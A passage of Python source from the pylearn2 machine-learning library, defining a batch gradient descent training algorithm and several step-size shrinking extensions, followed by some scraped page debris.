this algorithm that a large step size will generalize reasonably
well to other minibatches. To implement true Batch Gradient
Descent, set the batch_size to the total number of examples
available. If batch_size is None, it will revert to the model's
force_batch_size attribute.
batches_per_iter : int, optional
WRITEME
updates_per_batch : int, optional
Passed through to the optimization.BatchGradientDescent's
`max_iters parameter`
monitoring_batch_size : int
Size of monitoring batches.
monitoring_batches : WRITEME
monitoring_dataset : Dataset or dict, optional
A Dataset or a dictionary mapping string dataset names to Datasets
termination_criterion : WRITEME
set_batch_size : bool, optional
If True, BGD will attempt to override the model's
`force_batch_size` attribute by calling set_batch_size on it.
reset_alpha : bool, optional
Passed through to the optimization.BatchGradientDescent's
`reset_alpha` parameter
conjugate : bool, optional
Passed through to the optimization.BatchGradientDescent's
`conjugate` parameter
min_init_alpha : float, optional
WRITEME
reset_conjugate : bool, optional
Passed through to the optimization.BatchGradientDescent's
`reset_conjugate` parameter
line_search_mode : WRITEME
verbose_optimization : bool, optional
WRITEME
scale_step : float, optional
WRITEME
theano_function_mode : WRITEME
init_alpha : WRITEME
seed : WRITEME
"""
def __init__(self, cost=None, batch_size=None, batches_per_iter=None,
updates_per_batch=10, monitoring_batch_size=None,
monitoring_batches=None, monitoring_dataset=None,
termination_criterion=None, set_batch_size=False,
reset_alpha=True, conjugate=False, min_init_alpha=.001,
reset_conjugate=True, line_search_mode=None,
verbose_optimization=False, scale_step=1.,
theano_function_mode=None, init_alpha=None, seed=None):
self.__dict__.update(locals())
del self.self
if monitoring_dataset is None:
assert monitoring_batches is None
assert monitoring_batch_size is None
self._set_monitoring_dataset(monitoring_dataset)
self.bSetup = False
self.termination_criterion = termination_criterion
self.rng = make_np_rng(seed, [2012, 10, 16],
which_method=["randn", "randint"])
def setup(self, model, dataset):
"""
Allows the training algorithm to do some preliminary configuration
*before* we actually start training the model. The dataset is provided
in case other derived training algorithms need to modify model based on
the dataset.
Parameters
----------
model : object
A Python object representing the model to train. Loosely
implementing the interface of models.model.Model.
dataset : pylearn2.datasets.dataset.Dataset
Dataset object used to draw training data
"""
self.model = model
if self.cost is None:
self.cost = model.get_default_cost()
try:
if self.cost.is_stochastic():
raise TypeError("BGD is not compatible with stochastic "
"costs.")
except NotImplementedError:
warnings.warn("BGD is not compatible with stochastic costs "
"and cannot determine whether the current cost is "
"stochastic.")
if self.batch_size is None:
self.batch_size = model.force_batch_size
else:
batch_size = self.batch_size
if self.set_batch_size:
model.set_batch_size(batch_size)
elif hasattr(model, 'force_batch_size'):
if not (model.force_batch_size <= 0 or batch_size ==
model.force_batch_size):
raise ValueError("batch_size is %d but " +
"model.force_batch_size is %d" %
(batch_size, model.force_batch_size))
self.monitor = Monitor.get_monitor(model)
self.monitor.set_theano_function_mode(self.theano_function_mode)
data_specs = self.cost.get_data_specs(model)
mapping = DataSpecsMapping(data_specs)
space_tuple = mapping.flatten(data_specs[0], return_tuple=True)
source_tuple = mapping.flatten(data_specs[1], return_tuple=True)
# Build a flat tuple of Theano Variables, one for each space,
# named according to the sources.
theano_args = []
for space, source in safe_zip(space_tuple, source_tuple):
name = 'BGD_[%s]' % source
arg = space.make_theano_batch(name=name)
theano_args.append(arg)
theano_args = tuple(theano_args)
# Methods of `self.cost` need args to be passed in a format compatible
# with their data_specs
nested_args = mapping.nest(theano_args)
fixed_var_descr = self.cost.get_fixed_var_descr(model, nested_args)
self.on_load_batch = fixed_var_descr.on_load_batch
cost_value = self.cost.expr(model, nested_args,
** fixed_var_descr.fixed_vars)
grads, grad_updates = self.cost.get_gradients(
model, nested_args, ** fixed_var_descr.fixed_vars)
assert isinstance(grads, OrderedDict)
assert isinstance(grad_updates, OrderedDict)
if cost_value is None:
raise ValueError("BGD is incompatible with " + str(self.cost) +
" because it is intractable, but BGD uses the " +
"cost function value to do line searches.")
# obj_prereqs has to be a list of function f called with f(*data),
# where data is a data tuple coming from the iterator.
# this function enables capturing "mapping" and "f", while
# enabling the "*data" syntax
def capture(f, mapping=mapping):
new_f = lambda *args: f(mapping.flatten(args, return_tuple=True))
return new_f
obj_prereqs = [capture(f) for f in fixed_var_descr.on_load_batch]
if self.monitoring_dataset is not None:
if (self.monitoring_batch_size is None and
self.monitoring_batches is None):
self.monitoring_batch_size = self.batch_size
self.monitoring_batches = self.batches_per_iter
self.monitor.setup(
dataset=self.monitoring_dataset,
cost=self.cost,
batch_size=self.monitoring_batch_size,
num_batches=self.monitoring_batches,
obj_prereqs=obj_prereqs,
cost_monitoring_args=fixed_var_descr.fixed_vars)
params = model.get_params()
self.optimizer = BatchGradientDescent(
objective=cost_value,
gradients=grads,
gradient_updates=grad_updates,
params=params,
param_constrainers=[model.modify_updates],
lr_scalers=model.get_lr_scalers(),
inputs=theano_args,
verbose=self.verbose_optimization,
max_iter=self.updates_per_batch,
reset_alpha=self.reset_alpha,
conjugate=self.conjugate,
reset_conjugate=self.reset_conjugate,
min_init_alpha=self.min_init_alpha,
line_search_mode=self.line_search_mode,
theano_function_mode=self.theano_function_mode,
init_alpha=self.init_alpha)
# These monitoring channels keep track of shared variables,
# which do not need inputs nor data.
if self.monitoring_dataset is not None:
self.monitor.add_channel(
name='ave_step_size',
ipt=None,
val=self.optimizer.ave_step_size,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.monitor.add_channel(
name='ave_grad_size',
ipt=None,
val=self.optimizer.ave_grad_size,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.monitor.add_channel(
name='ave_grad_mult',
ipt=None,
val=self.optimizer.ave_grad_mult,
data_specs=(NullSpace(), ''),
dataset=self.monitoring_dataset.values()[0])
self.first = True
self.bSetup = True
def train(self, dataset):
"""
.. todo::
WRITEME
"""
assert self.bSetup
model = self.model
rng = self.rng
train_iteration_mode = 'shuffled_sequential'
if not is_stochastic(train_iteration_mode):
rng = None
data_specs = self.cost.get_data_specs(self.model)
# The iterator should be built from flat data specs, so it returns
# flat, non-redundent tuples of data.
mapping = DataSpecsMapping(data_specs)
space_tuple = mapping.flatten(data_specs[0], return_tuple=True)
source_tuple = mapping.flatten(data_specs[1], return_tuple=True)
if len(space_tuple) == 0:
# No data will be returned by the iterator, and it is impossible
# to know the size of the actual batch.
# It is not decided yet what the right thing to do should be.
raise NotImplementedError("Unable to train with BGD, because "
"the cost does not actually use data "
"from the data set. "
"data_specs: %s" % str(data_specs))
flat_data_specs = (CompositeSpace(space_tuple), source_tuple)
iterator = dataset.iterator(mode=train_iteration_mode,
batch_size=self.batch_size,
num_batches=self.batches_per_iter,
data_specs=flat_data_specs,
return_tuple=True,
rng=rng)
mode = self.theano_function_mode
for data in iterator:
if ('targets' in source_tuple and mode is not None
and hasattr(mode, 'record')):
Y = data[source_tuple.index('targets')]
stry = str(Y).replace('\n', ' ')
mode.record.handle_line('data Y ' + stry + '\n')
for on_load_batch in self.on_load_batch:
on_load_batch(mapping.nest(data))
self.before_step(model)
self.optimizer.minimize(*data)
self.after_step(model)
actual_batch_size = flat_data_specs[0].np_batch_size(data)
model.monitor.report_batch(actual_batch_size)
def continue_learning(self, model):
"""
.. todo::
WRITEME
"""
if self.termination_criterion is None:
return True
else:
rval = self.termination_criterion.continue_learning(self.model)
assert rval in [True, False, 0, 1]
return rval
def before_step(self, model):
"""
.. todo::
WRITEME
"""
if self.scale_step != 1.:
self.params = list(model.get_params())
self.value = [param.get_value() for param in self.params]
def after_step(self, model):
"""
.. todo::
WRITEME
"""
if self.scale_step != 1:
for param, value in safe_zip(self.params, self.value):
value = (1. - self.scale_step) * value + self.scale_step \
* param.get_value()
param.set_value(value)
class StepShrinker(TrainExtension, TerminationCriterion):
"""
.. todo::
WRITEME
"""
def __init__(self, channel, scale, giveup_after, scale_up=1.,
max_scale=1.):
self.__dict__.update(locals())
del self.self
self.continue_learning = True
self.first = True
self.prev = np.inf
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
monitor = model.monitor
if self.first:
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset,
data_specs=hack.data_specs)
channel = monitor.channels[self.channel]
v = channel.val_record
if len(v) == 1:
return
latest = v[-1]
logger.info("Latest {0}: {1}".format(self.channel, latest))
# Only compare to the previous step, not the best step so far
# Another extension can be in charge of saving the best parameters ever
# seen.We want to keep learning as long as we're making progress. We
# don't want to give up on a step size just because it failed to undo
# the damage of the bigger one that preceded it in a single epoch
logger.info("Previous is {0}".format(self.prev))
cur = algorithm.scale_step
if latest >= self.prev:
logger.info("Looks like using {0} "
"isn't working out so great for us.".format(cur))
cur *= self.scale
if cur < self.giveup_after:
logger.info("Guess we just have to give up.")
self.continue_learning = False
cur = self.giveup_after
logger.info("Let's see how {0} does.".format(cur))
elif latest <= self.prev and self.scale_up != 1.:
logger.info("Looks like we're making progress "
"on the validation set, let's try speeding up")
cur *= self.scale_up
if cur > self.max_scale:
cur = self.max_scale
logger.info("New scale is {0}".format(cur))
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
self.prev = latest
def __call__(self, model):
"""
.. todo::
WRITEME
"""
return self.continue_learning
class ScaleStep(TrainExtension):
"""
.. todo::
WRITEME
"""
def __init__(self, scale, min_value):
self.scale = scale
self.min_value = min_value
self.first = True
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
if self.first:
monitor = model.monitor
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset)
cur = algorithm.scale_step
cur *= self.scale
cur = max(cur, self.min_value)
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
class BacktrackingStepShrinker(TrainExtension, TerminationCriterion):
"""
.. todo::
WRITEME
"""
def __init__(self, channel, scale, giveup_after, scale_up=1.,
max_scale=1.):
self.__dict__.update(locals())
del self.self
self.continue_learning = True
self.first = True
self.prev = np.inf
def on_monitor(self, model, dataset, algorithm):
"""
.. todo::
WRITEME
"""
monitor = model.monitor
if self.first:
self.first = False
self.monitor_channel = sharedX(algorithm.scale_step)
# TODO: make monitor accept channels not associated with any
# dataset,
# so this hack won't be necessary
hack = monitor.channels.values()[0]
monitor.add_channel('scale_step', hack.graph_input,
self.monitor_channel, dataset=hack.dataset)
channel = monitor.channels[self.channel]
v = channel.val_record
if len(v) == 1:
return
latest = v[-1]
logger.info("Latest {0}: {1}".format(self.channel, latest))
# Only compare to the previous step, not the best step so far
# Another extension can be in charge of saving the best parameters ever
# seen.We want to keep learning as long as we're making progress. We
# don't want to give up on a step size just because it failed to undo
# the damage of the bigger one that preceded it in a single epoch
logger.info("Previous is {0}".format(self.prev))
cur = algorithm.scale_step
if latest >= self.prev:
logger.info("Looks like using {0} "
"isn't working out so great for us.".format(cur))
cur *= self.scale
if cur < self.giveup_after:
logger.info("Guess we just have to give up.")
self.continue_learning = False
cur = self.giveup_after
logger.info("Let's see how {0} does.".format(cur))
logger.info("Reloading saved params from last call")
for p, v in safe_zip(model.get_params(), self.stored_values):
p.set_value(v)
latest = self.prev
elif latest <= self.prev and self.scale_up != 1.:
logger.info("Looks like we're making progress "
"on the validation set, let's try speeding up")
cur *= self.scale_up
if cur > self.max_scale:
cur = self.max_scale
logger.info("New scale is {0}".format(cur))
algorithm.scale_step = cur
self.monitor_channel.set_value(np.cast[config.floatX](cur))
self.prev = latest
self.stored_values = [param.get_value() for param in
model.get_params()]
def __call__(self, model):
"""
.. todo::
WRITEME
"""
return self.continue_learning
|
[
"julius506@gmail.com"
] |
julius506@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.